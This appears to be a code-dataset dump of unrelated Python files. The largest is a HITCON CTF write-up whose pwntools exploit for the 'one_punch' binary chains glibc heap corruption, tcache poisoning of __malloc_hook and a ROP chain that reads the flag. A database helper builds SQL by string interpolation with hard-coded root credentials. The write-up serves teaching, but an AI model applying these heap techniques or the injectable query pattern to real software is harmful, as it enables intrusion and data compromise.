stored on the heap, it is not even true that it is stored with the very first allocation of the heap, because
the very first malloc actually triggers the malloc_hook, which initializes malloc_hook to zero AND returns
an allocated chunk... which is to say, it bypasses the tcache path. Therefore, tcache is only initialized on the SECOND
allocation, by which time this chunk has already been freed up, and since it is a tcache-less free, the memory
went right back into the top! So the end result was that this funky object is actually OVERLAPPING the tcache
descriptor... and that means that the "magic" value which must be 7+ is actually the index of tcache->counts[]
that corresponds to bin 0x200 which, you guessed it, corresponds to the allocation size 535.
So that basically means that we are not able to allocate with malloc UNLESS the tcache bin's count is 7+. However,
due to the default value of the global `_mp.tcache_count` being 7, this means in practice that we should only be able
to have maximum 7 in the heap-based tcache struct's counts array's appropriate index. And that means that we can only
allocate from a tcache bin when it is full. Which is a problem because tcache poisoning needs TWO consecutive allocations.
Also, hey, cool, now we see why the challenge is called "onepunch". Get it? And of course that's a Manga [reference](https://en.wikipedia.org/wiki/One-Punch_Man).
Well HITCON, that's just awesome. I hope the reader will appreciate the exploit name choice as well, courtesy of 2can.
So hold on, let's get back to the challenge solving.
We can't do fastbin poisoning, largebin poisoning, or tcache poisoning, how are we supposed to win exactly?
Cool, now we have an actual challenge! Let's solve it.
Read through all the comments all the way to the end to follow the construction of the exploit. There's
also a discussion at the end about alternative solutions.
'''
'''
First the basics, commands for communicating with the menu of the program that includes the commands:
show
retire
debut
rename
'''
import os
os.environ['TERM'] = 'xterm-256color'
from pwn import *
import time, struct
context.update(arch='amd64')
context.update(terminal=['tmux', 'splitw', '-h'])
# Target toggle; flipped to False below so a single edit switches to remote.
REMOTE = True
gdbscript = [
    # 'b calloc',
    'continue'
]
REMOTE = False
def cmd(cmdIdx):
    """Select a menu item by sending its numeric index."""
    p.recvuntil(">")
    p.sendline(str(cmdIdx)) #it is a read(8), but with \n we close it
def leak_heap(idx):
    """Show hero *idx* and decode its name as a little-endian heap pointer.

    Used on a freed chunk so the printed name is its tcache fd pointer.
    """
    cmd(3)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
    print p.recvuntil("hero name: ")
    leak = p.recvuntil("#")
    # Drop the trailing "\n#" that follows the name.
    leak = leak[:len(leak)-2]
    print "leak len is %d" % len(leak)
    # Pad to 8 bytes and unpack as an unsigned 64-bit little-endian value.
    leak = leak + "\x00\x00"
    leak = struct.unpack("<Q", leak)[0]
    print "#"
    return leak
def leak_libc(idx):
    """Show hero *idx* and decode the first 6 name bytes as a libc pointer.

    Used on an unsorted-bin chunk whose fd points into main_arena.
    """
    cmd(3)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
    print p.recvuntil("hero name: ")
    leak = p.recvn(6)
    # Userspace pointers fit in 6 bytes; pad to 8 for unpacking.
    leak = leak + "\x00\x00"
    leak = struct.unpack("<Q", leak)[0]
    print p.recvuntil("#")
    return leak
def show(idx):
    """Menu option 3: print hero *idx*'s name (debugging helper)."""
    cmd(3)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
    print p.recvuntil("hero name: ")
    print p.recvuntil("#")
def retire(idx):
    """Menu option 4: free hero *idx* (pointer is NOT nulled -> UAF)."""
    cmd(4)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
def debut(idx, name):
    """Menu option 1: calloc a hero of len(name) bytes into slot *idx*."""
    cmd(1)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
    print p.recvuntil("hero name: ")
    p.send(name)
def rename(idx, name):
    """Menu option 2: rewrite hero *idx*'s name (works on freed chunks too)."""
    cmd(2)
    print p.recvuntil("idx: ")
    p.sendline(str(idx))
    print p.recvuntil("hero name: ")
    p.send(name) #note: use \n to terminate it if len(name) < hero[idx].len
def secret(data):
    """Hidden command 50056: the single malloc(535), gated on tcache count >= 7."""
    cmd(50056)
    p.send(data)
    print p.recvuntil("5. Exit")
# Target selection: live remote service, or a local debug run under gdb.
if REMOTE == True:
    p = remote('52.198.120.1', 48763)
else:
    p = process('./one_punch', aslr=False)
    gdb.attach(p, gdbscript='\n'.join(gdbscript))
'''
And here comes the actual exploit code.
First, let's get a heap leak. if we retire two chunks, the first will have a tcache fd to the second.
'''
# --- Stage 1: heap and libc leaks ---
debut(0, (0x100-8)*"A")
debut(1, (0x100-8)*"B")
retire(0)
retire(1)
heap_base = leak_heap(1) - 0x260
print "heap base: 0x%016x" % heap_base
#now we get a libc leak. we can only maintain 3 pointers, but, we can forget our pointers
#and since we allocate with calloc, we never consume the tcache, only fill it.
#so we can easily fill the tcache for any slot. we select the slot that is necessary for the rest - the secretslot.
#535 is 0x217, that will be 0x220 sized chunks. we request 0x218 so we can write it totally, just in case.
#we need 7 in total, and we need a special reference to 1 of them, that is not on the edge so that it doesn't get consolidated. so 5+1+1
for i in range(0, 5):
    debut(0, (0x218)*"C")
    retire(0)
#however, we'll need to poison the fd of the first one on the bin (it's LIFO!), so we need a reference maintained to that. so use idx 2 for that.
#actually nevermind we can't do this now!
debut(2, (0x218)*"X")
retire(2)
#now the 7th one, again to 0
debut(0, (0x218)*"C")
retire(0)
#now we do one more - after this it's a candidate for leaking because it goes into unsorted now!
debut(0, (0x218)*"D")
#but first, we must create a fencepost allocation so that freeing it does not consolidate it into the top.
debut(1, 0x100*"F")
#now we can free it and leak libc!
retire(0)
libc_base = leak_libc(0) - (0x00007f057b0faca0- 0x7f057af16000)
print "libc base: 0x%016x" % libc_base
free_hook = libc_base + (0x7fd89ebe65a8 - 0x7fd89e9ff000)
print "free hook address: 0x%016x" % free_hook
system = libc_base + (0x7fd89ea51fd0 - 0x7fd89e9ff000)
print "system address: 0x%016x" % system
malloc_hook = libc_base + 0x1e4c30
#all right, now we have all the leaks, we have the best leaks. tremendous, people are saying these are the best leaks ever.
#we wanted to do tcache poisoning, but the stupid check screws us over.
# ok so we have the leaks, but to recap, we can't have it easy because:
# fastbin sizes are too small, <127 not allowed so we can't allocate to fastbin -> fastbin poisoning out (global_max_fast overwrite could work but if we achieved that we'd have already won anyway here
# largebin sizes start at 1024, so largebin poisoning is out for the same reason
# unsorted bin attack is properly mitigated on 19.04 so that's also out
# we have the custom defence against tcache poisoning (circumventing that is the whole game)
# only thing left is smallbin cache back filling attack, so we try that.
'''
Wait, what is the smallbin cache back filling attack? Well that's a valid question, because it hasn't been really
documented in house-of-xyz CTF lore... except that the incomparable 2can has already explained this in the ptmalloc
fanzine years ago, so, really... it's the obvious exploit primitive choice!
See here btw: http://tukan.farm/2017/07/08/tcache/
'''
# --- Stage 2: set up two smallbin chunks for the cache back-filling attack ---
# Ok, so, let's put together a smallbin cache filling attack that allows us to write that bin address SOMEWHERE. Then we figure out where to write it.
# first of all, we need to get some chunk into the smallbin. we already have a guy in the unsorted bin. if we now make an allocation request for an even bigger size, that guy is going to get moved into the smallbin. so let's do that.
#we must use 1 here, because we need to keep 0 pointing to the original smallbin chunk.
debut(1, (0x400-8)*"u")
# good, 0 landed on the smallbin. now we got to keep 0. so how do we free one more guy here? well, now we can do a double free, oy :)
# but this means we need a reference remaining to one of the guys we freed onto the tcache bin. I think we have a reference to 2, so we should be able to free 2 again, which should actually put it into the unsorted bin? nope, double free detected.
#however, due to the stupid double free protection, we can't *just* free this guy. we have to go and delete the key first. we can do that no problem.
rename(2, p64(0) + p64(0) + 8*"X" + "\n")
#now free it to the unsorted bin!
retire(2)
#now again alloc too large -> we get 2 on the smallbin!
debut(1, (0x400-8)*"u")
#now there is supposed to be 2 chunks in smallbin, and we are supposed to have pointers to both of them
#from here the smallbin tcache attack should work, giving us the win by releasing the tcache custom "lock"
#so the idea is to have exactly 1 slot in the tcache -> we get this by doing one secret allocation right now
secret("A"*535)
#and now we prime the smallbin attack by overwriting 0's fd and bk
#the chunk->bck->fd = bin write is our target. so if we want to write to X, we have to use the address X-0x20
#however, we must be very careful -> the fd must remain valid! so we have to write back here the correct value.
#since the smallbin cache filling goes BACKWARDS, the one we have to corrupt is 2 not 0!
#valid_fd = heap_base + (0x5557c0eceef0 - 0x5557c0ec9000 - 0x5000) #wtf i can't math
valid_fd = (0x55a65a39c330 - 0x55a65a39b000) + heap_base
# --- Stage 3: corrupt _mp.tcache_count, then classic tcache poisoning ---
#p.interactive()
'''
Cool! Now all we need is the proper choice for `smallbin_corruption_target_addr` here.
At this point, I'll confess that I went off on a huuuuuge tangent. I came up with some targets,
that aren't viable, or are viable but through some really heavy lifting. In the end, my fantastic
teammate 2can brought attention to the obvious target and we got the flag from there rather quickly.
Of course, I could tell you all about the alternative direction I came up with... but I don't want to spoil
future CTF challenges. So let's leave that out for now :)
Because, OF COURSE, the right choice is corrupting... `_mp.tcache_count` ITSELF.
Since, if that becomes > 7, then we can simply free more chunks onto the tcache bin, which means that malloc can
be called multiple times before we reach 6. So that gives us the tcache poisoning we wanted and the win, keeping
in mind that the challenge runs under a seccomp filter that ruins system() calls, so instead we had to reapply
the same rop chain with a stack lift gadget that was developed for [LazyHouse](https://gist.github.com/andigena/4628eae54ad185107fd3ca91fc6a92a3).
So how about the stack lift gadget? Well, we could target a free hook and use an rdi/rsp exchange gadget.. but even easier, we can use
a stack lift gadget in the literal sense, like `add rsp, 0x48 ; ret`. This is because, conveniently, the debut
function always reads the input first into a stack buffer and then allocates and copies it to the alloced buffer. That's cool because,
this way we'll have control over stack contents. Lovely.
'''
#so this is _mp.tcache_count`
smallbin_corruption_target_addr = libc_base + 0x1e42e0
rename(2, p64(valid_fd) + p64(smallbin_corruption_target_addr - 0x10) + "\n")
#rename(2, p64(valid_fd) + p64(heap_base+0x10+0x20-0x10) + "\n")
#now we have to trigger actually this smallbin tcache-ing. well, we need an exact size allocation request! we no longer need 2 so let's use it
debut(2, (0x218)*"D")
#now we can allocate many many chunks from tcache. We no longer need 0, so let's replace it with what will be the container for the path string that the rop chain uses.
debut(0, "/home/lazyhouse/flag\0".ljust(0x400-1))
# pause()
#Now we get another guy freed up and put on the tcache
secret(cyclic(25))
retire(2)
#Now we'll Double Free it, by corrupting the key this won't be detected.
rename(2, 'A'*8 + 'B'*8)
retire(2)
#Now we modify it's fd to point instead of itself to malloc_hook
rename(2, p64(malloc_hook-8) + cyclic(24))
retire(2)
rename(2, p64(malloc_hook-8) + cyclic(16))
#Now we allocate one guy, this primes the tcache poisoning
pivot = libc_base + 0x000000000008cfd6 # add rsp, 0x48 ; ret
print 'pivot: ', hex(pivot)
secret(p64(pivot) + p64(pivot) + p64(pivot))
#And finally we trigger the tcache poison, giving us the address over the malloc_hook, and use the content to overwrite it.
secret(p64(pivot) + p64(pivot) + p64(pivot))
# secret(cyclic(25))
# secret(cyclic(25))
'''
Now let's put the rop chain together... because the next allocation request will trigger malloc_hook with our desired
chain actually on the stack, just at a wrong offset. But since we invoke `add rsp, 0x48 ; ret` as the malloc hook, everything
comes together.
Lovely!
'''
# --- Stage 4: open/read/write ROP chain delivered via debut's stack buffer ---
flag_path_addr = heap_base + 0x1e70
print '0x55555555ae70, flag_path_addr: ', hex(flag_path_addr)
pop_rdi = libc_base + 0x0000000000026542 # pop rdi ; ret
pop_rsi = libc_base + 0x0000000000026f9e # pop rsi ; ret
pop_rdx = libc_base + 0x000000000012bda6 # pop rdx ; ret
pop_rcx = libc_base + 0x000000000010b31e # pop rcx ; ret
pop_rax = libc_base + 0x0000000000047cf8 # pop rax ; ret
ret = libc_base + 0x000000000002535f # ret
syscall_ret = libc_base + 0x00000000000cf6c5 # syscall ; ret
### for dev/debugging
# debut(0, '/home/lazyhouse/flag\0'.ljust(0x200))
print 'set *(size_t*)&__malloc_hook={}'.format(hex(pivot))
###
chain = flat([
    ret,
    ret,
    ret,
    pop_rax,
    2, # open
    pop_rdi,
    flag_path_addr,
    pop_rsi,
    constants.O_RDONLY,
    syscall_ret, # open
    pop_rax,
    0, # read
    pop_rdi,
    3,
    pop_rsi,
    flag_path_addr,
    pop_rdx,
    0x100,
    syscall_ret,
    pop_rax,
    1, # write
    pop_rdi,
    1,
    pop_rsi,
    flag_path_addr,
    pop_rdx,
    0x100,
    syscall_ret,
])
debut(0, chain.ljust(0x200))
p.interactive()
'''
And finally, we get the flag written out to us:
hitcon{y0u_f0rg0t_h0u23_0f_10r3_0r_4fra1d_1ar93_b1n_4tt4ck}
.... okay. Well, given the flag of LazyHouse, we highly suspect
that the challenge creators _thought_ that we will solve LazyHouse
with this attack, and we will not realize tcache reenablement here
and use a different vector.
One guess would be that we were supposed to do a largebin attack
to hit global_max_fast for fastbin poisoning reenablement (we are guessing).
We used that successfully for LazyHouse, and it works here too.
So as a corollary, it is worth mentioning that yes, even though we can't
do largebin sized allocations, it is not actually true we couldn't do
largebin attack here - as I realized as soon as we got the flag and it got
me thinking. Since, that only needs a smartly corrupted largebin-sized chunk
to be on the heap's unsorted bin when an allocation request happens; if that
request will be to a different size, this chunk can then go into a largebin,
then this corrupt chunk will trigger the known largebin attack.
And, I guess the trick is, we can free a non-largebin unto unsorted and then using
chunk overlapping that I didn't describe here but is very much possible and we
did achieve actually (alloc obj0 0x400, free back to unsorted to top, then alloc
obj1/obj2 smaller sizes, to overlap with the stale obj0 pointer), we can actually
manipulate a fake largebin-sized chunks into triggering the attack.
Maybe that's what the author had in mind. On the other hand, at first I didn't know
what they were driving at by mentioning house of lore. But finally I realized it, so
I'll amend this write-up with this.
So, "House of Lore" is smallbin poisoning basically. Same concept as for fastbin, but
the difference is that the safe unlinking check that was introduced severely limits targets
for it. In fact I used to think that it has no real applicability for ptmalloc with tcache
anymore, but as it turns out in exactly this kind of contrived "onepunch malloc" situation,
it does. So here is the description for it:
The general idea is that we corrupt the bck pointer of the smallbin chunk at the head of the
bin, so 2 allocations return a selected memory address (the fake bck) on the second attempt.
So just like fastbin/tcache poisoning. However, we can't choose _any_ address because of the
safe unlink check. Rather, we need a 'bck' where 'bck->fd == victim'. So an address where
we can control a pointer's value, but somehow is still an interesting target for us. As it
turns out, there are plenty like that due to all the bins. We could leverage the arena's
fastbins or regular bins for this. This actually works fine with malloc. But here is the problem:
with calloc, after libc_malloc returns, the returned chunk's size field is used to do the memset
to 0 and of course the size there includes +0x10 for the headers, so actually it is memset to
`chunk2mem(chunk)->size-0x10`. Unfortunately, with the arena based targets, that field can only
be 0 or a heap pointer, so that is always a sigsegv.
This is where I was so I considered this sort of useless, since with mallocs, tcache poisoning will
always be a much better target. However - IF we have the 1 malloc restriction (and don't overcome
it the "easy" way), well we can go after the tcache thread struct on the heap itself! This also
has an array of controllable heap pointers in the `entries` array, so it's a good target for smallbin
poisoning. The trick is getting a valid size field in there. I think there are two ways to do this:
1) manipulate overlapped-chunk sizes in order to free a chunk into the second largest tcache bin +
free chunks into the first and second smallest tcache bins. Then target the first `tcache->entries[]`
slot for smallbin poisoning. This will result in using 0x100 as size, so we manage to allocate over
the entries array. Since it is 64*8=512 bytes long, with a 0x400 size restriction here it would have
been easily achievable to directly then corrupt the entries member for the 0x220 slot and then win.
2) the harder way is to use one more trick instead of tcache "feng shui". As it turns out, still the
`unlink()` step in forward and backward consolidation of chunks in a free call only checks safe unlinking,
no other validity checks on the pointed chunks of `fd` and `bk`. That means that we could use an
overlapped chunk to create a fake forward coallesced chunk with fake `fd` and `bk` both pointing at
`&tcache->entries[X]`. Consequently, one of the entries members will be adjusted to become the other one.
That in turn again gives a direct allocation over a portion of `tcache->entries[]` with the malloc. From there,
one can again directly write a fake valid size field, and then free again to get back to the count 7 and then
redo the whole "house of lore" to once again allocate over the region, this time corrupting the entries
member for 0x220 instead of it size and then with the tcache-based malloc.
So that's our guess of what the challenge solution was supposed to be like... in our mind, this is too
complicated though.
'''
|
def aumentar(preço=0, taxa=0, formato=False):
    '''
    Increase a price by a percentage rate.

    :param preço: price entered by the user.
    :param taxa: percentage rate used to increase the price.
    :param formato: currency-formatted string (R$) if True, plain number if False.
    :return: the price with the rate applied.
    '''
    res = preço + preço * taxa / 100
    if formato is False:
        return res
    return moeda(res)
def diminuir(preço=0, taxa=0, formato=False):
    '''Decrease a price by a percentage rate; currency-formatted if *formato* is True.'''
    res = preço - preço * taxa / 100
    if formato is False:
        return res
    return moeda(res)
def dobro(preço=0, formato=False):
    '''Double a price; currency-formatted if *formato* is truthy.'''
    doubled = preço * 2
    if formato:
        return moeda(doubled)
    return doubled
def metade(preço=0, formato=False):
    '''Halve a price; currency-formatted if *formato* is truthy.'''
    half = preço / 2
    if formato:
        return moeda(half)
    return half
def moeda(preço=0, moeda='R$'):
    '''Format *preço* as a Brazilian-style currency string (comma as decimal separator).'''
    texto = f'{moeda}{preço:.2f}'
    return texto.replace('.', ',')
def resumo(preço=0, taxaa=10, taxar=5):
    '''Print a formatted summary of the price: double, half, raise and discount.

    :param preço: price to analyze.
    :param taxaa: percentage used for the increase line.
    :param taxar: percentage used for the reduction line.
    '''
    print('-'*30)
    print('RESUMO DO VALOR'.center(30)) # center() centers the heading in 30 columns
    print('-'*30)
    print(f'Preço analisado: \t{moeda(preço)}') # \t aligns the value column
    print(f'Dobro do preço: \t{dobro(preço,True)}')
    print(f'Metade do preço: \t{metade(preço,True)}')
    print(f'{taxaa}% de aumento: \t{aumentar(preço, taxaa, True)}')
    print(f'{taxar}% de redução: \t\t{diminuir(preço, taxar, True)}') # extra \t needed to keep alignment
    print('-'*30)
|
23,495 | 48b1f68fe0148b67eb50227ad24a446f49c065ad | from setuptools import setup, find_packages
from dpm import __VERSION__
import os
# Long description for PyPI comes straight from the README.
with open('README.md') as f:
    long_description = f.read()
setup(
    name='dpm',
    # Render the package's version tuple as a dotted string, e.g. (1, 2, 3) -> "1.2.3".
    version='.'.join((str(v) for v in __VERSION__)),
    author='DICEhub',
    author_email='info@dicehub.com',
    description='DICE package manager',
    long_description=long_description,
    url='http://dicehub.com',
    packages = find_packages(),
    # rfc6266 at this version is fetched from GitHub rather than PyPI.
    dependency_links=[
        'https://github.com/g2p/rfc6266/archive/master.zip#egg=rfc6266-0.0.4',
    ],
    install_requires=[
        'PyYAML',
        'rfc3987',
        'progressbar2',
        'requests',
        'rfc6266'],
)
|
23,496 | 8374a8251f6f7344a102cc5c0a2114b6bddae18e | import os, re
from multiprocessing import Process, Manager
class Analyzer(object):
    """Naive topic classifier built from per-topic vocabularies.

    *path_to_data* must contain one sub-directory per topic, each holding
    plain-text files; vocabularies are built in parallel worker processes.
    """

    def __init__(self, num_proc, path_to_data):
        """
        :param num_proc: number of worker processes used by start_process().
        :param path_to_data: directory whose sub-directories are the topics.
        """
        self.num_proc = num_proc
        self.path_to_data = path_to_data
        # Manager-backed list so worker processes can publish results.
        self.global_lst = Manager().list()
        self.topic_lst = os.listdir(path_to_data)
        # Ceiling division in pure integers. The original compared true and
        # floor float division to detect a remainder, which is fragile for
        # large values due to float precision.
        self.size_group = -(-len(self.topic_lst) // num_proc)
        # One placeholder entry per topic; overwritten by analyzer().
        for _ in range(len(self.topic_lst)):
            self.global_lst.append([10])

    @staticmethod
    def _unique_words(text):
        """Split *text* on non-word characters; return unique non-empty tokens."""
        return list(filter(None, set(re.split(r'\W| ', text))))

    def analyzer(self, index_process):
        """Worker: build the vocabulary for this process's slice of topics.

        :param index_process: worker index; handles topics
            [size_group * index_process, size_group * (index_process + 1)).
        """
        start = self.size_group * index_process
        for i in range(start, start + self.size_group):
            if i >= len(self.topic_lst):
                break
            topic_dir = os.path.join(self.path_to_data, self.topic_lst[i])
            buffer_str = ""
            for text in os.listdir(topic_dir):
                with open(os.path.join(topic_dir, text), 'r') as file:
                    buffer_str += file.read().lower()
            self.global_lst[i] = self._unique_words(buffer_str)

    def determine_topic(self, filename):
        """Return the topic whose vocabulary overlaps *filename*'s words the most."""
        with open(filename, 'r') as file:
            words = set(self._unique_words(file.read().lower()))
        # Overlap score = |topic_vocab ∩ document_words| for each topic
        # (vocabularies are duplicate-free, so this equals the original
        # len(vocab) - len(set(vocab) - words) computation).
        result_lst = [len(set(self.global_lst[i]) & words)
                      for i in range(len(self.topic_lst))]
        return self.topic_lst[result_lst.index(max(result_lst))]

    def start_process(self):
        """Fan analyzer() out over num_proc processes and wait for completion."""
        proc_lst = [Process(target=self.analyzer, args=(i,)) for i in range(self.num_proc)]
        for proc in proc_lst:
            proc.start()
        for proc in proc_lst:
            proc.join()
23,497 | 357711e5b2a4379d9f5f6c2560bd93b47f28b341 | #!/usr/bin/env python
"""overall database manipulation class
.. module:: DBHelper
:platform: Ubuntu Unix
:synopsis: A module for general database connection
.. moduleauthor:: Lijuan Marissa Zhou <marissa.zhou.cn@gmail.com>
.. copyright:: copyright reserved
Image file names:
SenseCam - 00031075.JPG
Vicon - 00011328.JPG -> 0_0_date_time.j
Autographer - B00000781_21I5I2_20140303_1200294.JPG
"""
import _mysql
import MySQLdb as mdb
import unicodedata
from timeutils import *
from datetime import datetime as dt
from threading import Thread
from time import sleep
from django.db import IntegrityError
from dateutil.tz import tzlocal
from xml.dom import minidom
#from fileuploader.models import *
class DBHelper:
# database connection
con = None
    @staticmethod
    def initialize():
        """Open the module-wide MySQL connection and store it on DBHelper.con.

        NOTE(review): credentials are hard-coded; presumably a development
        setup — confirm before deploying.
        """
        DBHelper.con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
    @staticmethod
    def update_picture_record(addresses, album_ids):
        """Update each picture row with its new file path, album and capture date.

        :param addresses: iterable of rows; each row is (old_path, new_path,
            capture_time) based on the indices used below — TODO confirm
            against the caller.
        :param album_ids: dict mapping 'YYYY-MM-DD' date strings to album ids.

        SECURITY NOTE(review): the UPDATE is built by string interpolation
        with hand-added quotes — vulnerable to SQL injection if paths are
        attacker-influenced; should be migrated to parameterized execute().
        """
        import time
        time.strftime('%Y-%m-%d %H:%M:%S')
        con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
        print album_ids
        for row in addresses:
            with con:
                capture_time = row[2]
                # new path is split to recover year/month/day path components
                infos = row[1].split("/")
                #date_string = infos[2]+"-"+infos[3]+"-"+infos[4]
                date_string = str(capture_time.date())
                #print date_string
                aid = album_ids[date_string]# album id
                cur = con.cursor()
                # Hand-quoted string parameters; numeric ones left bare.
                para_1 = "'"+ row[1]+"'"
                para_2 = aid
                para_3 = infos[2]
                para_4 = infos[3]
                para_5 = infos[4]
                para_6 = "'"+ row[0]+"'"
                capture_time = row[2]
                query = "UPDATE fileuploader_picture SET file=%s,album_id=%s,year=%s,month=%s,day=%s,capture_at=CAST('%s' AS DATETIME) WHERE file=%s" % (para_1,para_2,para_3,para_4,para_5,capture_time,para_6,)
                print query
                #print query
                cur.execute(query)
@staticmethod
def update_sensor_file(src, dst):
""" This function updates all sensor_file_records
Initialise MYSQL connection
:param :
:returns: No return
"""
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
src = "'"+ src+"'"
dst = "'"+ dst+"'"
query = "UPDATE fileuploader_sensorfile SET file=%s WHERE file=%s" % (src,dst)
cur = con.cursor()
cur.execute(query)
@staticmethod
def remove_empty_albums(aid):
""" This function keeps album table clean without any empty albums
Empty albums are albums that has no picture associated with that album
This is necessary when uploading SenseCam images which are uploaded in a temporary album at the beginning and a temporary album is created for this purposes
:param aid: album id
:type aid: big integar
:returns: No return
"""
print "aid"
print aid
if aid is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT count(*) from fileuploader_picture WHERE album_id=%s" % (aid)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
# there is no picture in this album
print "len(data)"
print len(data)
if len(data) == 0:
query = "DELETE from fileuploader_album WHERE id=%s" % (aid)
print query
cur = con.cursor()
cur.execute(query)
@staticmethod
def get_uid(username):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if username is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from auth_user WHERE username=%s" % (username)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_sensor_type_id(abbreviation):
""" This function retrieves sensor type id according to abbreviation
:param abbreviation: sensor type abbreviation
:type abbreviation: string
:returns: No return
"""
if abbreviation is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from fileuploader_sensortype WHERE abbreviation=%s" % (abbreviation)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_picture_id(path):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if path is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from fileuploader_picture WHERE file=%s" % (path)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_concept_id(concept):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if path is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from annotater_annotationterm WHERE concept=%s" % (concept)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def insert_annotationactions(annotations):
""" This function add all annotation records into database through one database connection
:param annotations: annotations list extracted from exported annotation file from the old sensecambrowser system
:type annotations: list of 3 dimensional list
:returns: No return
"""
if annotations is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
for annotation in annotations:
username = annotation[0]
path = annotation[1]
concept = annotation[2]
uid = DBHelper.get_user_id(username)
iid = DBHelper.get_user_id(path)
cid = DBHelper.get_user_id(concept)
query = "insert into annotater_annotationaction(annotator_id,image_id,concept_id) values(%s,%s,%s)" % (uid,iid,cid)
cur = con.cursor()
cur.execute(query)
@staticmethod
def insert_sensors(sensors):
""" This function adds all sensor records into the new database through one database connection
:param sensors: sensors list extracted from exported sensor file from the old sensecambrowser system
:type sensors: list of sensor list
:returns: No return
"""
if sensors is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
for sensor in sensors:
"""
username = annotation[0]
path = annotation[1]
concept = annotation[2]
uid = DBHelper.get_user_id(username)
iid = DBHelper.get_user_id(path)
cid = DBHelper.get_user_id(concept)
query = "insert into annotater_annotationaction(annotator_id,image_id,concept_id) values(%s,%s,%s)" % (uid,iid,cid)
cur = con.cursor()
cur.execute(query)
"""
|
23,498 | 71b845ee6d8304da73c06e13277df35d27065cc3 | import ROOT as r
import glob
# Per-quantity plot configuration: source file stem, canvas title, x-axis
# label and the grade-B / grade-C threshold positions for the marker lines.
parameters = {
    'NoiseROC': {'file': 'NoiseROC', 'canvas': 'Mean Noise per ROC',
                 'xaxistitle': 'Mean Noise [e^{-}]', 'gradB': 500, 'gradC': 1000},
    'Noise': {'file': 'NoiseDistr', 'canvas': 'Noise distribution',
              'xaxistitle': 'Noise [e^{-}]', 'gradB': 50, 'gradC': 400},
    'RelativeGainWidth': {'file': 'RelativeGainWidth', 'canvas': 'Relative Gain Width',
                          'xaxistitle': 'Relative Gain Width', 'gradB': 0.1, 'gradC': 0.2},
    'VcalThresholdWidth': {'file': 'VcalThresholdWidth', 'canvas': 'Vcal Threshold Width',
                           'xaxistitle': 'Width of Vcal Threshold [e^{-}]', 'gradB': 200, 'gradC': 400},
    'PHCalibrationParameter1': {'file': 'PHCalibrationParameter1', 'canvas': 'PH Calibration Parameter1',
                                'xaxistitle': 'Parameter 1', 'gradB': 0, 'gradC': 2},
    'PedestalSpread': {'file': 'PedestalSpread', 'canvas': 'Pedestal Spread',
                       'xaxistitle': 'Average Pedestal [e^{-}]', 'gradB': 2500, 'gradC': 5000},
    # Only in case the current is measured at -20C:
    'Current150V': {'file': 'Current150V', 'canvas': 'Current at Voltage 150V',
                    'xaxistitle': 'Measured current at 150V [microA]', 'gradB': 2, 'gradC': 10},
    'SlopeIV': {'file': 'SlopeIV', 'canvas': 'Slope IV',
                'xaxistitle': 'Slope IV [microA]', 'gradB': 400, 'gradC': 2},
}
# This is for all modules:
#ProdCenters = ['CERN_all', 'PERUGIA', 'AACHEN', 'ETH']
# This is for all modules with ROC digv21resppin
ProdCenters = ['CERN_respin', 'ETH']
temperatures = ['m20', 'p17']
def GetFilePath(par, temperature):
    """Collect the ROOT result files for quantity *par* at *temperature*
    across every configured production center."""
    stem = parameters[par]['file']
    matches = []
    for center in ProdCenters:
        matches += glob.glob('Results/' + center + '*/' + temperature + stem + '.root')
    return matches
def CreateStack(FilePath, par, temperature):
    """Build a THStack of the per-production-center histograms for *par*.

    :param FilePath: list of ROOT file paths, one per production center
    :param par: key into the module-level ``parameters`` dict
    :param temperature: temperature tag ('m20'/'p17') appended to the
        canvas name inside each file
    :returns: (stack, listdata) where listdata[i] == [entries, mean, rms]
        of the i-th histogram
    """
    stack = r.THStack('stack', parameters[par]['canvas'])
    # BUG FIX: the original hard-coded two sub-lists (``[[], []]``) and
    # raised IndexError when more than two files were supplied; allocate
    # one stats list per input file instead.
    listdata = [[] for _ in FilePath]
    for i, path in enumerate(FilePath):
        File = r.TFile(path)
        cFile = File.Get(parameters[par]['canvas'] + temperature)
        histo = cFile.GetListOfPrimitives()[1]
        # 3-letter production-center tag taken from the path
        # ('Results/<CENTER>...' -> chars 8..10)
        histo.SetName(path[8:11])
        histo.SetLineColor(i + 2)
        histo.SetFillColor(i + 2)
        stack.Add(histo)
        histo.SetStats(0)
        listdata[i].append(histo.GetEntries())
        listdata[i].append(histo.GetMean())
        listdata[i].append(histo.GetRMS())
    return stack, listdata
def main():
    """Draw one stacked comparison plot per (temperature, parameter) pair
    and save it as .png/.pdf/.root under Results/CompareModulesRespin/.

    Each plot overlays the production-center histograms, draws the grade-B
    and grade-C threshold lines, and annotates per-center N/mean/RMS.
    """
    for temperature in temperatures:
